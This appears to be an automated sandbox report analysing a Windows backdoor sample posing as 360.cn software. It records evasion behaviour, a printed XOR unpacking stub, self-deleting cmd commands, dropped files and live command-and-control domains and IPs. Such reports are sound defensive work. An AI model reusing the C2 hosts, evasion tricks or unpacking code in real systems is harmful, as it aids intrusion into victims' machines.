Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\WinH83.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-1480
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-1522
Source: C:\Windows\SysWOW64\WinH83.exeStalling execution: Execution stalls by calling Sleepgraph_1-1249
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-1645
Source: C:\Windows\SysWOW64\WinH83.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-1585
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-1353
Source: C:\Windows\SysWOW64\WinH83.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-1319
Source: C:\Windows\SysWOW64\WinH83.exeAPI coverage: 9.7 %
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe TID: 6932Thread sleep time: -1800000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WinH83.exe TID: 3624Thread sleep time: -1800000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeThread delayed: delay time: 1800000Jump to behavior
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.000000000056E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`I]%SystemRoot%\system32\mswsock.dll
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.00000000005DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.00000000005C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeAPI call chain: ExitProcess graph end nodegraph_0-1670
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeAPI call chain: ExitProcess graph end nodegraph_0-1497
Source: C:\Windows\SysWOW64\WinH83.exeAPI call chain: ExitProcess graph end nodegraph_1-1455
Source: C:\Windows\SysWOW64\WinH83.exeAPI call chain: ExitProcess graph end nodegraph_1-1628
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_0040D07E LoadLibraryA,GetProcAddress,EntryPoint,DeleteFileA,0_2_0040D07E
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_0040D07E mov eax, dword ptr fs:[00000030h]0_2_0040D07E
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_0040D06A mov eax, dword ptr fs:[00000030h]0_2_0040D06A
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_00401030 mov eax, dword ptr fs:[00000030h]0_2_00401030
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_00401030 mov eax, dword ptr fs:[00000030h]0_2_00401030
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_00401030 mov eax, dword ptr fs:[00000030h]0_2_00401030
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_004071E2 mov eax, dword ptr fs:[00000030h]0_2_004071E2
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_0040D07E mov eax, dword ptr fs:[00000030h]1_2_0040D07E
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_0040D06A mov eax, dword ptr fs:[00000030h]1_2_0040D06A
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_00401030 mov eax, dword ptr fs:[00000030h]1_2_00401030
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_00401030 mov eax, dword ptr fs:[00000030h]1_2_00401030
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_00401030 mov eax, dword ptr fs:[00000030h]1_2_00401030
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_004071E2 mov eax, dword ptr fs:[00000030h]1_2_004071E2
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeProcess created: C:\Windows\SysWOW64\WinH83.exe "C:\Windows\system32\WinH83.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nulJump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nulJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_00402CB0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,_strnicmp,_strnicmp,GetVersionExA,wsprintfA,GlobalMemoryStatusEx,_ui64toa,GetSystemDefaultUILanguage,0_2_00402CB0
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
Service Execution
14
Windows Service
1
Access Token Manipulation
12
Masquerading
1
Credential API Hooking
1
Security Software Discovery
Remote Services1
Credential API Hooking
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts12
Native API
1
DLL Side-Loading
14
Windows Service
21
Virtualization/Sandbox Evasion
LSASS Memory21
Virtualization/Sandbox Evasion
Remote Desktop Protocol1
Archive Collected Data
11
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
Process Injection
1
Access Token Manipulation
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
11
Process Injection
NTDS2
System Information Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
File Deletion
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1657698 Sample: SecuriteInfo.com.BackDoor.D... Startdate: 06/04/2025 Architecture: WINDOWS Score: 88 24 www.003zzy.com 2->24 28 Antivirus / Scanner detection for submitted sample 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 PE file has a writeable .text section 2->32 34 May modify the system service descriptor table (often done to hook functions) 2->34 8 SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe 9 2->8         started        signatures3 process4 dnsIp5 26 www.003zzy.com 5.79.71.225, 80 LEASEWEB-NL-AMS-01NetherlandsNL Netherlands 8->26 20 C:\Windows\SysWOW64\WinH83.exe, PE32 8->20 dropped 22 C:\Windows\...\WinH83.exe:Zone.Identifier, ASCII 8->22 dropped 36 Found evasive API chain (may stop execution after checking mutex) 8->36 38 Drops executables to the windows directory (C:\Windows) and starts them 8->38 40 May modify the system service descriptor table (often done to hook functions) 8->40 42 Deletes itself after installation 8->42 13 WinH83.exe 8->13         started        16 cmd.exe 8->16         started        file6 signatures7 process8 signatures9 44 Antivirus detection for dropped file 13->44 46 Found evasive API chain (may stop execution after checking mutex) 13->46 48 Found stalling execution ending in API Sleep call 13->48 50 2 other signatures 13->50 18 cmd.exe 13->18         started        process10

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe70%VirustotalBrowse
SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe78%ReversingLabsWin32.Backdoor.Farfli
SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe100%AviraTR/Crypt.XPACK.Gen
SourceDetectionScannerLabelLink
C:\Windows\SysWOW64\WinH83.exe100%AviraTR/Crypt.XPACK.Gen
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://www.003zzy.com/ad1in.htmC0%Avira URL Cloudsafe
http://www.003zzy.com/ad1in.htms?0%Avira URL Cloudsafe
http://www.003zzy.com/ad1in.htmC:0%Avira URL Cloudsafe
http://www.003zzy.com/ad1in.htm0%Avira URL Cloudsafe
http://www.003zzy.com/ad1in.htmhv0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
www.003zzy.com
5.79.71.225
truefalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://www.003zzy.com/ad1in.htmSecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, WinH83.exe, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://www.003zzy.com/ad1in.htmCSecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://www.google.comWinH83.exe, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmpfalse
      high
      http://www.003zzy.com/ad1in.htmC:SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://www.003zzy.com/ad1in.htmhvSecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://www.003zzy.com/ad1in.htms?SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      5.79.71.225
      www.003zzy.comNetherlands
      60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
      Joe Sandbox version:42.0.0 Malachite
      Analysis ID:1657698
      Start date and time:2025-04-06 09:30:31 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 3m 20s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:4
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
      Detection:MAL
      Classification:mal88.evad.winEXE@8/4@1/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 15
      • Number of non-executed functions: 93
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Stop behavior analysis, all processes terminated
      • Excluded IPs from analysis (whitelisted): 184.31.69.3
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      03:31:26API Interceptor1x Sleep call for process: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe modified
      03:31:32API Interceptor1x Sleep call for process: WinH83.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      5.79.71.2257778FcwhJz.exeGet hashmaliciousShizBrowse
      • xudylenyrob.eu/login.php
      OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
      • gatyfus.com/login.php
      Bonelessness.exeGet hashmaliciousSimda StealerBrowse
      • gatyfus.com/login.php
      file.exeGet hashmaliciousUnknownBrowse
      • www.kukutrustnet7.info/t_100_v400/?rnd=1278909843&id=632934364559
      yjsdMJTchO.exeGet hashmaliciousPonyBrowse
      • therepherpe.ru/zapoy/gate.php
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      LEASEWEB-NL-AMS-01NetherlandsNLmips.elfGet hashmaliciousMiraiBrowse
      • 85.17.24.184
      utorrent_installer.exeGet hashmaliciousUnknownBrowse
      • 178.162.174.75
      utorrent_installer.exeGet hashmaliciousUnknownBrowse
      • 178.162.173.144
      Shipping Documents.pdf.exeGet hashmaliciousGuLoaderBrowse
      • 95.211.44.250
      http://cdn.systweak.com/downloads/setups/dpfw/dpfsetup_afterupdate_1004.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
      • 5.79.122.22
      .i.elfGet hashmaliciousMiraiBrowse
      • 5.79.83.114
      jade420.arm.elfGet hashmaliciousMiraiBrowse
      • 31.186.168.37
      http://update.hobiter.comGet hashmaliciousUnknownBrowse
      • 85.17.31.122
      drea4.elfGet hashmaliciousGafgyt, MiraiBrowse
      • 95.211.189.197
      http://www.greendon.com/Get hashmaliciousUnknownBrowse
      • 95.211.219.66
      No context
      No context
      Process:C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:modified
      Size (bytes):50382421
      Entropy (8bit):4.8397788165428794
      Encrypted:false
      SSDEEP:
      MD5:C7B758D198A32EF2BA4112EF346C74BA
      SHA1:0B7EF8BC77C32AFD14EFF2C624F2BFE3221E9216
      SHA-256:BA4F9F2FF33C114E082151EC91E23EE287028BBD08A11F1CB29CE410C9EE49C1
      SHA-512:2036B63BA3322903A8C00DCDACADB082AB1021834FD771E7EB9B53139C9AEC2510D613EA12C9EA8F7A20155B8B95331491640D651FE84DDFA36723ECBA3F5C37
      Malicious:true
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........g...g...g...{...g..9{...g..EG...g..EG...g...g..2g..yh...g..Rx...g..}a...g..Rich.g..........................PE..L.....FJ[LordPE].............P......~........`....@.........................................................................E........................................................................................................................text....H.......J.................. ....rdata.......`.......N..............@....data...<+...p.......\..............@....mackt...............v..............`....vmp0............................... .. .reloc..............................@..B300................................. ....Katja..............................@....rsrc.... ..........................@..@........................................................................................................................................................
      Process:C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):26
      Entropy (8bit):3.95006375643621
      Encrypted:false
      SSDEEP:3:ggPYV:rPYV
      MD5:187F488E27DB4AF347237FE461A079AD
      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
      Malicious:true
      Reputation:high, very likely benign file
      Preview:[ZoneTransfer]....ZoneId=0
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):32
      Entropy (8bit):4.351409765557392
      Encrypted:false
      SSDEEP:3:oX6S0rvn:oXY7n
      MD5:9E990DB6A2F50100468FA41138047EB7
      SHA1:7ECCFF3574EF5B5A7CDC7725E470BE1D3A5DADBB
      SHA-256:0A0E4C2B943BC5777613B57E09283F372754CBFDB60B101B60C7F45C61F3DC24
      SHA-512:7BC71FF3625449E14CECBE69AC1043A6AF807B3310B7AC91021FDF6EBB07676157EEFD0C9473C3B96B1621C4E90351D2B4EC254DEE837865C0C96C2C5729C11D
      Malicious:false
      Reputation:low
      Preview:C:\Windows\SysWOW64\WinH83.exe..
      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):4.8002840680985805
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
      File size:25'208'853 bytes
      MD5:4194ba809c07479d0b6c3681d218661b
      SHA1:2e8c858633dd5d519d8a7231150ddbc24fef2675
      SHA256:666e5e939aca03a8c323fc257063430fbab202f6ae1c4bf8c04fe62c75dade4b
      SHA512:d1fdbf68fe48122eb3150bab37d6e61a4a1461b3211e653093aa5f4a387275e36551a5969764e3dba4b603025a36803f03eade1c48c33db64c180e89f1e98521
      SSDEEP:768:Epynh7s4ofEwaGHxAL/IoqATi+N1YMv47DUQYUbv8HU2LsNNkm9QIPwAHS:Epyh7FofEwjMI1ATiAP4RYUfKmlPRS
      TLSH:3E4722443EDE5816FBDB9933407F3DA6702F405C558FB22B89D96216B4F103A0AFD1AA
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............g...g...g...{...g..9{...g..EG...g..EG...g...g..2g..yh...g..Rx...g..}a...g..Rich.g..........................PE..L.....FJ[Lo
      Icon Hash:b2b239396d33f051
      Entrypoint:0x40d07e
      Entrypoint Section:300
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      DLL Characteristics:
      Time Stamp:0x4A4601AD [Sat Jun 27 11:25:33 2009 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:75a7edd5e27e3873db683bbba6fe50dc
      Instruction
      pushad
      mov dword ptr [0040D068h], ecx
      push 0040D002h
      call dword ptr [0040E056h]
      mov eax, dword ptr [0040D068h]
      cmp eax, ecx
      je 00007F66B522E5C8h
      popad
      nop
      nop
      nop
      nop
      mov eax, dword ptr fs:[00000030h]
      nop
      mov eax, dword ptr [eax+18h]
      nop
      mov eax, dword ptr [eax+0Ch]
      cmp eax, 02h
      je 00007F66B522E62Dh
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      ret
      nop
      nop
      nop
      pushad
      call 00007F66B522E625h
      pop ebx
      xor bx, bx
      add ebx, 00001000h
      push 000002F4h
      pop ecx
      mov eax, dword ptr [ebx]
      xor eax, 22DD55EEh
      mov dword ptr [ebx], eax
      add ebx, 04h
      loop 00007F66B522E614h
      popad
      nop
      nop
      pushad
      call 00007F66B522E625h
      pop ebx
      xor bx, bx
      add ebx, 00001CDCh
      push 000019D1h
      pop ecx
      mov eax, dword ptr [ebx]
      xor eax, 22DD55EEh
      mov dword ptr [ebx], eax
      add ebx, 04h
      loop 00007F66B522E614h
      popad
      nop
      pushad
      call 00007F66B522E625h
      pop ebx
      xor bx, bx
      add ebx, 000085ECh
      push 00000101h
      pop ecx
      mov eax, dword ptr [ebx]
      xor eax, 22DD55EEh
      mov dword ptr [ebx], eax
      add ebx, 04h
      loop 00007F66B522E614h
      popad
      mov dword ptr [00401E76h], FFFFFD67h
      jmp 00007F66B522E4FEh
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      Programming Language:
      • [LNK] VC++ 6.0 SP5 build 8804
      • [C++] VS98 (6.0) build 8168
      • [EXP] VC++ 6.0 SP5 build 8804
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0xe1450x8c.Katja
      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x1504.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000x10.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x48a50x4a0019a8c9be028846d0695fc5d7ed1786e1False0.6620565878378378COM executable for DOS7.183221181125893IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .rdata0x60000xc860xe003faacc8d9bdb0bba9502ef9abf92c7ecFalse0.45200892857142855data5.204326514440395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .data0x70000x2b3c0x1a00fff70a9be21a1df56244b684a22bfcedFalse0.6604567307692307data6.6392803389643005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .mackt0xa0000x10000x1000b6665b84385f56250cb043829252ce2cFalse0.310302734375data3.429642363371091IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .vmp00xb0000x3810x40057e1e1ce532f5f5d62e1fe232271d622False0.740234375data5.873286808120885IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE
      .reloc0xc0000x100x2005265fb518934649cf18f37241a28e09eFalse0.056640625GLS_BINARY_LSB_FIRST0.19977565608732903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      3000xd0000x2000x200cae9fd76ccb99fa73cee42562f62caa6False0.44140625data3.6700111801610693IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .Katja0xe0000x10000x1958d18773c7a60edfa7f3a902f8d2c212cFalse0.528395061728395data3.2369415694512034IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .rsrc0xf0000x20000x1600cf92fcb478234b44464107f3c9b16e03False0.36274857954545453data5.49774110339037IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      NameRVASizeTypeLanguageCountryZLIB Complexity
      RT_ICON0xf0f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.3545966228893058
      RT_GROUP_ICON0x101980x14dataChineseChina1.1
      RT_VERSION0x101ac0x358dataChineseChina0.48598130841121495
      DLLImport
      kernel32.dllLoadLibraryA, GetProcAddress, GetTickCount, DeleteFileA
      GDI32.dllDeleteObject, GetDIBits
      ADVAPI32.dllCloseServiceHandle
      DescriptionData
      CompanyName(C)360.cn Inc.All Rights Reserved.
      FileDescription360.cn
      FileVersion360
      InternalName3, 2, 2, 1002
      LegalCopyright(C)360.cn Inc.All Rights Reserved.
      OriginalFilenameZhuDongFangYu.exe
      ProductName360
      ProductVersion3, 2, 2, 1002
      SpecialBuild668531542187500
      Translation0x0409 0x04b0
      Language of compilation systemCountry where language is spokenMap
      ChineseChina

      Download Network PCAP: filteredfull

      • Total Packets: 4
      • 80 (HTTP)
      • 53 (DNS)
      TimestampSource PortDest PortSource IPDest IP
      Apr 6, 2025 09:31:28.462925911 CEST4971780192.168.2.55.79.71.225
      Apr 6, 2025 09:31:29.465687990 CEST4971780192.168.2.55.79.71.225
      Apr 6, 2025 09:31:31.559541941 CEST4971780192.168.2.55.79.71.225
      TimestampSource PortDest PortSource IPDest IP
      Apr 6, 2025 09:31:27.789021969 CEST6542453192.168.2.51.1.1.1
      Apr 6, 2025 09:31:28.422461987 CEST53654241.1.1.1192.168.2.5
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Apr 6, 2025 09:31:27.789021969 CEST192.168.2.51.1.1.10x426eStandard query (0)www.003zzy.comA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Apr 6, 2025 09:31:28.422461987 CEST1.1.1.1192.168.2.50x426eNo error (0)www.003zzy.com5.79.71.225A (IP address)IN (0x0001)false
      Apr 6, 2025 09:31:28.422461987 CEST1.1.1.1192.168.2.50x426eNo error (0)www.003zzy.com85.17.31.82A (IP address)IN (0x0001)false
      Apr 6, 2025 09:31:28.422461987 CEST1.1.1.1192.168.2.50x426eNo error (0)www.003zzy.com85.17.31.122A (IP address)IN (0x0001)false
      Apr 6, 2025 09:31:28.422461987 CEST1.1.1.1192.168.2.50x426eNo error (0)www.003zzy.com178.162.203.202A (IP address)IN (0x0001)false
      Apr 6, 2025 09:31:28.422461987 CEST1.1.1.1192.168.2.50x426eNo error (0)www.003zzy.com178.162.203.211A (IP address)IN (0x0001)false
      Apr 6, 2025 09:31:28.422461987 CEST1.1.1.1192.168.2.50x426eNo error (0)www.003zzy.com178.162.203.226A (IP address)IN (0x0001)false
      Apr 6, 2025 09:31:28.422461987 CEST1.1.1.1192.168.2.50x426eNo error (0)www.003zzy.com178.162.217.107A (IP address)IN (0x0001)false
      Apr 6, 2025 09:31:28.422461987 CEST1.1.1.1192.168.2.50x426eNo error (0)www.003zzy.com5.79.71.205A (IP address)IN (0x0001)false
      Target ID:0
      Start time:03:31:26
      Start date:06/04/2025
      Path:C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe"
      Imagebase:0x400000
      File size:25'208'853 bytes
